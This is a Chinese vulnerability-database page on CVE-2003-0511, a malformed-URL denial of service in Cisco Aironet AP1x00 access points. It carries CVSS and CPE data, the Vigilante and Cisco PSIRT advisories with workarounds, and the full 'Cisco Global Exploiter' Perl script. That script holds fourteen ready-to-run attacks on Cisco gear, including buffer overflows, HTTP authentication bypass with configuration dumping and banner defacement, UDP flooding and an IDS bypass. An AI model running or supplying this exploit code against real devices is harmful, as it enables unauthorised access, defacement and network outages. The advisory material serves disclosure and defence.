CVE-2003-0511
CVSS5.0
发布时间 :2003-08-27 00:00:00
修订时间 :2009-03-04 00:18:24
NMCOEPS    

[原文]The web server for Cisco Aironet AP1x00 Series Wireless devices running certain versions of IOS 12.2 allow remote attackers to cause a denial of service (reload) via a malformed URL.


[CNNVD]Cisco AP1x00 HTTP GET请求远程拒绝服务攻击漏洞(CNNVD-200308-181)

        
        Cisco Aironet AP1X00系列是Cisco发行的无线接入点,提供基于802.11b WIFI标准的无线接入方案。
        Cisco Aironet AP1X00的WEB接口没有正确处理HTTP GET请求,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
        如果Cisco Aironet AP1X00设备提供HTTP接口的访问,通过发送畸形URL请求给HTTP服务器,可导致无线接入点崩溃,这个攻击不需要任何验证,攻击成功后,设备需要重新启动否则不能对正常通信进行服务。
        所有基于VxWorks软件的Cisco Aironet Access Point 1200不受此漏洞影响,这些软件版本包括11.56、12.01T1、12.02T1、12.03T。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:cisco:ios:12.2%284%29ja1Cisco IOS 12.2 (4)JA1
cpe:/o:cisco:ios:12.2%2811%29jaCisco IOS 12.2 (11)JA
cpe:/o:cisco:ios:12.2%284%29jaCisco IOS 12.2 (4)JA
cpe:/o:cisco:ios:12.2%288%29jaCisco IOS 12.2 (8)JA

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5834Cisco Aironet Wireless Devices DoS
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0511
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0511
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-181
(官方数据源) CNNVD

- 其它链接及资源

http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003001.htm
(UNKNOWN)  MISC  http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003001.htm
http://www.cisco.com/warp/public/707/cisco-sa-20030728-ap1x00.shtml
(UNKNOWN)  CISCO  20030728 HTTP GET Vulnerability in AP1x00
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0055.html
(VENDOR_ADVISORY)  VULNWATCH  20030728 Cisco Aironet AP 1100 Malformed HTTP Request Crash Vulnerability

- 漏洞信息

Cisco AP1x00 HTTP GET请求远程拒绝服务攻击漏洞
中危 其他
2003-08-27 00:00:00 2009-03-04 00:00:00
远程  
        
        Cisco Aironet AP1X00系列是Cisco发行的无线接入点,提供基于802.11b WIFI标准的无线接入方案。
        Cisco Aironet AP1X00的WEB接口没有正确处理HTTP GET请求,远程攻击者可以利用这个漏洞对设备进行拒绝服务攻击。
        如果Cisco Aironet AP1X00设备提供HTTP接口的访问,通过发送畸形URL请求给HTTP服务器,可导致无线接入点崩溃,这个攻击不需要任何验证,攻击成功后,设备需要重新启动否则不能对正常通信进行服务。
        所有基于VxWorks软件的Cisco Aironet Access Point 1200不受此漏洞影响,这些软件版本包括11.56、12.01T1、12.02T1、12.03T。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 关闭设备中的HTTP服务或限制用户的访问。
        厂商补丁:
        Cisco
        -----
        Cisco建议用户使用固件版本到12.2(11)JA1:
        
        http://www.cisco.com/tacpage/sw-center/sw-ios.shtml

- 漏洞信息 (22962)

Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability (EDBID:22962)
hardware dos
2003-07-28 Verified
0 blackangels
N/A [点击下载]
source: http://www.securityfocus.com/bid/8290/info

Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload.

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  -close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);

  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  while (<$sockd>){ print }
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}
		

- 漏洞信息 (F31463)

VIGILANTE-2003001.txt (PacketStormID:F31463)
2003-07-29 00:00:00
Reda Zitouni  vigilante.com
advisory,web
cisco
CVE-2003-0511
[点击下载]

Vigilante Advisory 2003001 - It is possible to cause Cisco Aironet Access Point to crash and reboot if the HTTP server feature is enabled. This can be accomplished by submitting a specially crafted request to the web server. There is no need to authenticate to perform this attack, only access to the web server is required. The Aironet bridge reboots upon receiving the request and failing to handle correctly this one. Afterwards, no further access to the WLAN or its services is possible.

VIGILANTe Security Watch Advisory
 
Name: Cisco Aironet AP 1100 Malformed HTTP Request Crash Vulnerability
Systems Affected: Tested on a Cisco Aironet AP1100 Model 1120B Series
Wireless device.
Firmware version 12.2(4)JA and earlier.
Severity: High Risk
Vendor URL: http://www.vigilante.com
Authors: Reda Zitouni (reda.zitouni@vigilante.com)
Date: 28th July 2003
Advisory Code: VIGILANTE-2003001
 
Description
***********
Cisco Aironet 1100 Series Access Point is a device manufactured by Cisco
Systems offering a WLAN solution based on the 802.11b Wifi standard.
The Arionet Bridge is vulnerable to a denial of service.This can be
exploited remotely by an attacker. No user login or password is
necessary.
 
Details
*******
 
It is possible to cause Cisco Aironet Access Point to crash and reboot
if the HTTP server feature is enabled. This can be accomplished by
submitting a specially crafted request to the web server. There is no
need to authenticate to perform this attack, only access to the web
server is required. The Aironet bridge reboots upon receiving the
request and failing to handle correctly this one. Afterwards, no further
access to the WLAN or its services is possible.
 
Vendor status:
**************
Cisco was contacted June 19, 2003 and answered the same day. 5 days
later, they told us that they would release a patch soon. The patch was
finally released July 3, 2003.
 
Vulnerability Assessment:
A test case to detect this vulnerability was added to SecureScan NX in
the upgrade package of July 28, 2003. You can see the documentation of
this test case 17655 on SecureScan NX web site at
http://securescannx.vigilante.com/tc/17655 . 
Fix:  A firmware upgrading the Aironet IOS version to c1100-k9w7 has
been released by Cisco. Please note that this version fixes some other
bugs as TC 15438 (refer to release note).
 
Workaround:
***********
1. If not needed - disable access to the web feature on the Aironet
Bridge. 
2. If needed - restrict access to the HTTP service for outside
connections.
CVE: Common Vulnerabilities and Exposures group ( reachable at
http://cve.mitre.org/ ) was contacted and assigned CAN-2003-0511 to this
vulnerability. 
 
Links:
*****
Cisco Advisory:
http://www.cisco.com/warp/public/707/cisco-sa-20030728-ap1x00.shtml
Vigilante Advisory:
http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003001.htm
Product Homepage:  http://www.cisco.com/warp/public/cc/pd/witc/ps4570
CVE: CAN-2003-0511
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CAN-2003-0511
 

Credit:
******
This vulnerability was discovered by Reda Zitouni, member of our
Security Watch Team at VIGILANTe. 
We wish to thank Cisco PSIRT Team for their fast answer to fix this
problem. 
 
Copyright VIGILANTe.com, Inc. 2003-07-28
 
Disclaimer:
**********
The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any consequences whatsoever arising out
of or in connection with the use or spread of this information. Any use
of this information lays within the user's responsibility.
 
Feedback:
********
Please send suggestions, updates, and comments to
securitywatch@vigilante.com.
 
 
    

- 漏洞信息 (F31462)

ciscoHTTP.txt (PacketStormID:F31462)
2003-07-29 00:00:00
Cisco Systems PSIRT  
advisory,denial of service
cisco
CVE-2003-0511
[点击下载]

Cisco Security Advisory - Sending a malformed URL to the Cisco Aironet AP1x00 can cause the device to reload resulting in a denial of service.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

           Cisco Security Advisory: HTTP GET Vulnerability in AP1x00

Revision 1.0

  For Public Release 2003 July 28 16:00 UTC (GMT)

     ----------------------------------------------------------------------

Contents

     Summary
     Affected Products
     Details
     Impact
     Software Versions and Fixes
     Obtaining Fixed Software
     Workarounds
     Exploitation and Public Announcements
     Status of This Notice: FINAL
     Distribution
     Revision History
     Cisco Security Procedures

     ----------------------------------------------------------------------

Summary

   A vulnerability has been reported by an external researcher in Cisco
   IOS(R) release for Cisco Aironet AP1x00 Series Wireless devices. The
   vulnerability affects only IOS-based Cisco Aironet Wireless products. The
   VxWorks based Cisco Aironet Wireless Devices are not affected. This
   vulnerability can cause the AP1x00 to reload and is documented as Cisco
   bug ID CSCeb49869 (registered customers only) (also CAN-2003-0511). There
   are workarounds available to mitigate the effects of this vulnerability.

   This advisory is posted at
   http://www.cisco.com/warp/public/707/cisco-sa-20030728-ap1x00.shtml.

   The external report can be found at
   http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003002.htm
   leavingcisco.com. Although it mentions two issues only one is addressed by
   this advisory. The other issue, Cisco bug ID CSCdz29724 (registered
   customers only) (also CAN-2003-512), is present in all IOS software and is
   duplicated by the AP1x00 specific Cisco bug ID CSCeb49842 (registered
   customers only) . More details about it can be found at
   http://www.cisco.com/warp/public/707/cisco-sn-20030724-ios-enum.shtml.

Affected Products

   Only the following Cisco IOS-based wireless Access Points are affected:

   +------------------------------------------+
   |   Hardware Model   | Software Release(s) |
   |--------------------+---------------------|
   |Cisco Aironet       |12.2(4)JA,           |
   |Wireless Access     |12.2(4)JA1,          |
   |Point AP1100 series |12.2(8)JA, 12.2(11)JA|
   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Access     |12.2(8)JA, 12.2(11)JA|
   |Point AP1200 series |                     |
   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Bridge     |12.2(11)JA           |
   |AP1400 series       |                     |
   +------------------------------------------+

   All previous VxWorks-based software releases for Cisco Aironet Access
   Point 1200 are not affected. That includes the following, and earlier,
   software releases: 11.56, 12.01T1, 12.02T1, 12.03T.

   In order to determine your software release you should log on the Access
   Point using any account available and execute the following command:

 access-point> show ver

 Cisco Internetwork Operating System Software
 IOS (tm) C1100 Software (C1100-K9W7-M), Version 12.2(8)JA, EARLY
 DEPLOYMENT RELEASE SOFTWARE (fc1)               ^^^^^^^^^
 TAC Support: http://www.cisco.com/tac
 Copyright (c) 1986-2003 by cisco Systems, Inc.

   The Cisco IOS software version is displayed in the second line of the
   output. In this example it is 12.2(8)JA.

Details

   Sending a malformed URL to the Cisco Aironet AP1x00 can cause the device
   to reload.

Impact

   Repeated exploitation of this vulnerability can lead to a prolonged
   Denial-of-Service (DoS) of the AP1x00.

Software Versions and Fixes

   The vulnerability is fixed in the 12.2(11)JA1 version of the software for
   all Cisco Aironet AP1x00 devices.

Obtaining Fixed Software

   Cisco is offering free software upgrades to address these vulnerabilities
   for all affected customers. Customers may only install and expect support
   for the feature sets they have purchased. By installing, downloading,
   accessing or otherwise using such software upgrades, customers agree to be
   bound by the terms of Cisco's software license terms found at
   http://www.cisco.com/public/sw-license-agreement.html, or as otherwise set
   forth at the Cisco Connection Online Software Center at
   http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

   Customers with service contracts should contact their regular update
   channels to obtain the free software upgrade identified via this advisory.
   For most customers with service contracts, this means that upgrades should
   be obtained through the Software Center on Cisco's worldwide website at
   http://www.cisco.com/tacpage/sw-center/sw-wireless.shtml. To access the
   software download URL, you must be a registered user and you must be
   logged in.

   Customers whose Cisco products are provided or maintained through prior or
   existing agreement with third-party support organizations such as Cisco
   Partners, authorized resellers, or service providers should contact that
   support organization for assistance with the upgrade, which should be free
   of charge.

   Customers who purchase direct from Cisco but who do not hold a Cisco
   service contract and customers who purchase through third-party vendors
   but are unsuccessful at obtaining fixed software through their point of
   sale should get their upgrades by contacting the Cisco Technical
   Assistance Center (TAC). TAC contacts are as follows.

     * +1 800 553 2447 (toll free from within North America)

     * +1 408 526 7209 (toll call from anywhere in the world)

     * e-mail: tac@cisco.com

   Please have your product serial number available and give the URL of this
   notice as evidence of your entitlement to a free upgrade. Free upgrades
   for non-contract customers must be requested through the TAC.

   Please do not contact either "psirt@cisco.com" or
   "security-alert@cisco.com" for software upgrades.

Workarounds

   There are two workarounds for this vulnerability. One is to use
   access-class or access-list commands to limit the access to legitimate
   hosts only, and another workaround is to disable HTTP and use SSH to
   administer the Cisco Aironet Access Point.

   The example of using access-class is given here:

 ap(config)# ip http access-class 10
 ap(config)# access-list 10 permit host 10.0.0.1

   In this example, host 10.0.0.1 is the only one that is allowed to access
   the AP. All other hosts are prohibited.

   To disable HTTP and enable SSH use this example:

 ap(config)# no ip http server
 ap(config)# ip domain name <your-domain>
 ap(config)# crypto key generate rsa
 The name for the keys will be: ap.your-domain
 Choose the size of the key modulus in the range of 360 to 2048 for your
  General Purpose Keys. Choosing a key modulus greater than 512 may take
  a few minutes.

 How many bits in the modulus [512]: 1024
 % Generating 1024 bit RSA keys ...[OK]
 ap(config)# line vty 0 4
 ap(config-line)# transport input ssh

   Now you can connect to the Cisco Aironet AP using SSH client from your
   computer. There are many free and commercial versions of SSH software
   available.

   In addition to the workarounds it is possible to mitigate the exposure by
   configuring ACLs on the device so that only legitimate hosts can use the
   http service. This can be done in the following way:

 access-list 111 permit tcp host 10.0.0.1 host 10.0.0.50 eq www

   In this example the host 10.0.0.1 is the only one that is allowed to
   access the device at 10.0.0.50. You will have to change host IP addresses
   and the ACL number to suit your configuration. This ACL will have to be
   applied to all interfaces and block all IP addresses assigned to the
   affected device.

Exploitation and Public Announcements

   This vulnerability is reported by Reda Zitouni from Vigilante. Their
   report can be found at
   http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003002.htm
   leavingcisco.com.

   The Cisco PSIRT is not aware of malicious use of the vulnerability
   described in this advisory.

Status of This Notice: FINAL

   This is a final advisory. Although Cisco cannot guarantee the accuracy of
   all statements in this advisory, all of the facts have been checked to the
   best of our ability. Cisco does not anticipate issuing updated versions of
   this advisory unless there is some material change in the facts. Should
   there be a significant change in the facts, Cisco will update this
   advisory.

   A stand-alone copy or paraphrase of the text of this security advisory
   that omits the distribution URL in the following section is an
   uncontrolled copy, and may lack important information or contain factual
   errors.

Distribution

   This notice will be posted on Cisco's worldwide website at .

   In addition to worldwide web posting, a text version of this notice is
   clear-signed with the Cisco PSIRT PGP key and is posted to the following
   e-mail and Usenet news recipients.

     * cust-security-announce@cisco.com

     * bugtraq@securityfocus.com

     * full-disclosure@lists.netsys.com

     * first-teams@first.org (includes CERT/CC)

     * cisco@spot.colorado.edu

     * cisco-nsp@puck.nether.net

     * comp.dcom.sys.cisco

     * Various internal Cisco mailing lists

   Future updates of this advisory, if any, will be placed on Cisco's
   worldwide website, but may or may not be actively announced on mailing
   lists or newsgroups. Users concerned about this problem are encouraged to
   check the above URL for any updates.

Revision History

   +------------------------------------------+
   |Revision|2003-July-28 16:00 UTC  |Initial |
   |1.0     |(GMT)                   |public  |
   |        |                        |release.|
   +------------------------------------------+

Cisco Security Procedures

   Complete information on reporting security vulnerabilities in Cisco
   products, obtaining assistance with security incidents, and registering to
   receive security information from Cisco, is available on Cisco's worldwide
   website at
   http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This
   includes instructions for press inquiries regarding Cisco security
   notices. All Cisco security advisories are available at
   http://www.cisco.com/go/psirt.

     ----------------------------------------------------------------------

   This notice is Copyright 2003 by Cisco Systems, Inc. This notice may be
   redistributed freely after the release date given at the top of the text,
   provided that redistributed copies are complete and unmodified, and
   include all date and version information.

     ----------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Comment: PGP Signed by Sharad Ahlawat, Cisco Systems PSIRT

